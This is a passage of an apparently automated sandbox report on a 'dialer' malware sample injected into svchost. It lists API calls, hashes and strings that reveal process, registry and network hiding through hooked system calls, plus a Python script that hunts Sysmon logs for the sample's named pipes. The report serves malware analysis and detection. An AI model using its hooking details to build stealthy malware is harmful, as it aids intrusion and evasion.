                                                                                • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: 2308ca6eaf7bf6aa6e5fd7c2dad65274fa0cdee15cec1e8ea3a4e6064b89d7b3
                                                                                • Instruction ID: 43a0cbb6118ac9185dba083df37bfa5a8251914ca7472923389a44b33500f4d1
                                                                                • Opcode Fuzzy Hash: 2308ca6eaf7bf6aa6e5fd7c2dad65274fa0cdee15cec1e8ea3a4e6064b89d7b3
                                                                                • Instruction Fuzzy Hash: BC4153F1601A4486FA26DF47F884BE927A0E78DBC4F584122EF0E877B1DA38C586C300

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 926137887-0
                                                                                • Opcode ID: d9a872710ed99017faa0aba6aa6fc20f036904564ea786093dba8e779631c78c
                                                                                • Instruction ID: a4e62dc8e7d81a00801526d2a511ced90750e179f40fb15ec58be7477c50376c
                                                                                • Opcode Fuzzy Hash: d9a872710ed99017faa0aba6aa6fc20f036904564ea786093dba8e779631c78c
                                                                                • Instruction Fuzzy Hash: F221E3B0715A0292FA1BDB53F9483E92360B76CBD0F444161EB1E47AB4DB7A8986C300

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: 0e7c40df18b2d889cb18027e33d092cab4b671df9256c1c141fb24a14e92ca32
                                                                                • Instruction ID: 2d94c89a0dbc5eaf2f8d64577ab743d1a622af76d4dc519d29f5ea4fbe6584bb
                                                                                • Opcode Fuzzy Hash: 0e7c40df18b2d889cb18027e33d092cab4b671df9256c1c141fb24a14e92ca32
                                                                                • Instruction Fuzzy Hash: 245114B6B11544DAEB16CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: 0203b8193e6bd01d2269ae2997a65bc3a8e51b9bb463c4828a750bc6846778a9
                                                                                • Instruction ID: 7f685618ca937b17e8a77ff3462c9f9b221cac2c692d946b3ecbcedae4a5563c
                                                                                • Opcode Fuzzy Hash: 0203b8193e6bd01d2269ae2997a65bc3a8e51b9bb463c4828a750bc6846778a9
                                                                                • Instruction Fuzzy Hash: 15F09671A14A4482E612EF6AB9417ED6360E75D7C1F50D221FF4E576A6DF3CD182C310

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: f5d6f4d19039afd7669e997dc8e3bf76fcc59d2d2e4ea198e7921c6a9a2d6c1d
                                                                                • Instruction ID: fa24f775fc133e2fb8ddb0fda3fc4b66b3fc9b3ea8c54cca86470a464386792f
                                                                                • Opcode Fuzzy Hash: f5d6f4d19039afd7669e997dc8e3bf76fcc59d2d2e4ea198e7921c6a9a2d6c1d
                                                                                • Instruction Fuzzy Hash: 4F01B2B5705A0192FA1BDB53FE083E86360B76CBD1F454061EF0953AB4DF79C996C200

                                                                                Execution Graph

                                                                                Execution Coverage: 56.2%
                                                                                Dynamic/Decrypted Code Coverage: 0%
                                                                                Signature Coverage: 87.5%
                                                                                Total number of Nodes: 8
                                                                                Total number of Limit Nodes: 1

                                                                                Callgraph


                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000041.00000002.3306534127.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000041.00000002.3306380561.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000041.00000002.3306534127.00000001404DC000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000041.00000002.3306534127.0000000140500000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000041.00000002.3306534127.0000000140503000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000041.00000002.3306534127.000000014078B000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000041.00000002.3306534127.000000014080D000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000041.00000002.3309638252.0000000140847000.00000004.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 1941872368-0
                                                                                • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                                • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

Execution Graph

Execution Coverage: 0.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 81
Total number of Limit Nodes: 2

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442
• Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction ID: 16feaae96375266c24b17968b5a080657b5ae57e6ff703aba3d68dcbcffacad4
• Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction Fuzzy Hash: 2F711736358F1486EB15DF22FC5BB9963B4FB88B8AF001561EA4E47A68DF38C444C358

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction ID: aade9cdc764c3959dde9a52c1c94ad6719753b48d41f7c1d1db878778cbbdd05
• Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction Fuzzy Hash: A411F93269CF008AFB6EA761FC0F79E2294B7A4347F4081A5D906496D0EF7CC044C62C

Control-flow Graph

APIs
  • Part of subcall function 00000257E10A1628: GetProcessHeap.KERNEL32 ref: 00000257E10A1633
  • Part of subcall function 00000257E10A1628: HeapAlloc.KERNEL32 ref: 00000257E10A1642
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16B2
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16DF
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A16F9
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1719
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1734
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1754
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A176F
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A178F
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17AA
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A17CA
• Sleep.KERNEL32 ref: 00000257E10A1AD7
• SleepEx.KERNELBASE ref: 00000257E10A1ADD
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17E5
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1805
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1820
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1840
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A185B
  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A187B
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1896
  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A18A0
Memory Dump Source
• Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
• Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction ID: d712d7bd41ce4f32cb42d1788969e2e1ab98e8c502d066c5c5fdd1db537eb6f4
• Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction Fuzzy Hash: 9F31F871298F4582FF5E9726FE4B3E923A4AB44BC2F0858615E0987695FF34C451C228

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: e1821c6af69327561f239fb501c7fdcfb84665abf8bb743926d129d5342e2f1a
• Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction Fuzzy Hash: 4E617572B49B9087DB5AEF14E80B73DB3A2F744BE5F188161DE4903788CA78D852C704

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
• Instruction ID: a05134c9a34ff4c1d66afd38e5ef54d71b3b96099cc726008d15654598d14383
• Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
• Instruction Fuzzy Hash: 3BB1D032258F5482EB6EDF25EC4B7A963A5F744B86F0450A6EE0953B95DF34CC80C398

APIs
Memory Dump Source
• Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
• Instruction ID: 219ced55679ac893985f66a80f0dbd7178f5651cf27174fbf386b8ec505e6a56
• Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
• Instruction Fuzzy Hash: 29314A72249F808AEB65DF60F8867EE7360F784745F44802ADA4E57B98EF38C648C714

APIs
Memory Dump Source
• Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
• Instruction ID: 3bbfa850ad8dbd0e4a6fa2243018912ee9c80721fc4e2599e2c74e45bb328308
• Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
• Instruction Fuzzy Hash: 1531AD32258F8086EB69CF25FC467AE73A0F789755F504166EA9D43B98EF38C145CB04

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction ID: eced55502f1a75a026b6edf846e6a0891afcc2511a2fde73ec7a25957e053ce4
• Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction Fuzzy Hash: 39517C32248F8486EB59CF66F84A75A77A1F389F8AF088524DE5907718DF3CC049C704

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction ID: 729b3f40a99a6114c8675349f500bf02ad9969b64215182506dd6b7d13de966c
• Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction Fuzzy Hash: 6C319574298F4AE1EA0FEFA5FCABBD46325B75434BF8054A3940902576DF3C8249C768

Control-flow Graph

• Rendered graph not reproduced; entry block 257e1076910, with paths through __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: c413f792152c6e77bcdec011d4ce604bdbff46f8c7e2d41a41648d6f97dd56db
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 7481476178CF0586F65FBB2ABC4F3B922D0E785782F5480A49A2647797DB38C8458B0C

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000257E10ACE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEBC
                                                                                • SetLastError.KERNEL32 ref: 00000257E10ACED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000257E10AECCC,?,?,?,?,00000257E10ABF9F,?,?,?,?,?,00000257E10A7AB0), ref: 00000257E10ACF2C
                                                                                  • Part of subcall function 00000257E10AD6CC: HeapAlloc.KERNEL32 ref: 00000257E10AD721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF54
                                                                                  • Part of subcall function 00000257E10AD744: HeapFree.KERNEL32 ref: 00000257E10AD75A
                                                                                  • Part of subcall function 00000257E10AD744: GetLastError.KERNEL32 ref: 00000257E10AD764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 44b74c0836ad876a2fac46d0e824247e53a8591ac7bd446e8d08f2f1267c89cf
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 3D4182703CDF4441FAAFA7357E5F3AD22815B447B2F6547A4A936066D6DE38C401872C

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: fd144254930c9193e2e316754b6910d439631fa1b8b54bcb3ad30ea55ac0c1ae
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: DB214F32658F4082FB19CB25F84A75A73A0F789BA6F504255EA6903BA8CF3CC149CF04
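The API ID above (Process, File, CloseHandle, Create/Current/Open/Read/Thread/Wow64/Write) together with the two pipe names points at a parent that spawns a child of the matching bitness and exchanges data with it over \\.\pipe\dialerchildproc32 or \\.\pipe\dialerchildproc64. As an added example (not from the report or from the sample), the Python below runs that pipe-name indicator over Sysmon PipeCreated/PipeConnected events (Event IDs 17 and 18) and also surfaces pipe stems that appear with both a 32 and a 64 suffix, the trace a renamed variant of the same parent/child scheme would leave. The event lines are constructed; the PIDs and image paths in them are invented for the demo.

```python
r"""Added example (not from the report or the sample): hunt Sysmon pipe telemetry
for the named pipes this function builds (\\.\pipe\dialerchildproc32 and
\\.\pipe\dialerchildproc64).  Sysmon Event ID 17 is PipeCreated and 18 is
PipeConnected; Sysmon's PipeName field carries only the part after \\.\pipe,
e.g. "\dialerchildproc64".  The JSON event lines below are constructed."""
import json
import re
from collections import defaultdict

PIPE_PREFIX = "\\\\.\\pipe\\"                              # literal \\.\pipe\ prefix
IOC_PIPES = {"dialerchildproc32", "dialerchildproc64"}     # from the report's string list
SUFFIX_RE = re.compile(r"^(.+?)(32|64)$")                  # stem + bitness suffix


def normalise_pipe(name: str) -> str:
    r"""Strip a \\.\pipe\ prefix (CreateNamedPipe spelling) or the leading
    backslash (Sysmon spelling) and lowercase, so both spellings compare equal."""
    name = name.strip()
    if name.lower().startswith(PIPE_PREFIX):
        name = name[len(PIPE_PREFIX):]
    return name.lstrip("\\").lower()


def find_pipe_iocs(lines):
    """Scan JSON-lines Sysmon events.

    Returns (hits, paired).  hits: the 17/18 events whose pipe is in IOC_PIPES,
    with process context for triage.  paired: pipe stems seen with both a 32
    and a 64 suffix, the shape a parent and child of different bitness produce;
    use it as a pivot when the family is renamed and the exact IoC no longer fires."""
    hits = []
    suffixes = defaultdict(set)
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        if ev.get("EventID") not in (17, 18):
            continue
        pipe = normalise_pipe(ev.get("PipeName", ""))
        if pipe in IOC_PIPES:
            hits.append({"event_id": ev["EventID"], "pid": ev.get("ProcessId"),
                         "image": ev.get("Image"), "pipe": pipe})
        m = SUFFIX_RE.match(pipe)
        if m:
            suffixes[m.group(1)].add(m.group(2))
    paired = sorted(stem for stem, seen in suffixes.items() if seen == {"32", "64"})
    return hits, paired


# Constructed Sysmon-style events (not real telemetry); PipeName uses Sysmon's spelling
SAMPLE_EVENTS = r'''
{"EventID": 17, "ProcessId": 4212, "Image": "C:\\Windows\\System32\\svchost.exe", "PipeName": "\\dialerchildproc64"}
{"EventID": 18, "ProcessId": 5120, "Image": "C:\\Windows\\SysWOW64\\svchost.exe", "PipeName": "\\dialerchildproc32"}
{"EventID": 17, "ProcessId": 700, "Image": "C:\\Windows\\System32\\lsass.exe", "PipeName": "\\lsass"}
{"EventID": 17, "ProcessId": 3300, "Image": "C:\\Program Files\\Vendor\\updater.exe", "PipeName": "\\updater64"}
{"EventID": 1, "ProcessId": 3301, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c whoami"}
'''

if __name__ == "__main__":
    hits, paired = find_pipe_iocs(SAMPLE_EVENTS.splitlines())
    for h in hits:
        print(f"event {h['event_id']} pid {h['pid']} {h['image']} -> {PIPE_PREFIX}{h['pipe']}")
    print("32/64 paired stems:", paired)
```

The exact-name match is the alert; the 32/64 pairing is deliberately not an alert on its own, since some legitimate software ships bitness-specific helpers, but a stem that pairs and is created by a process the report also flags for injection is worth a look.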

                                                                                Control-flow Graph

• Rendered graph not reproduced; entry block 257e1079944
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: eee8ddbebd137ff77ed4dfc8451c6d54f91bdde69a51e284d5195fa703101059
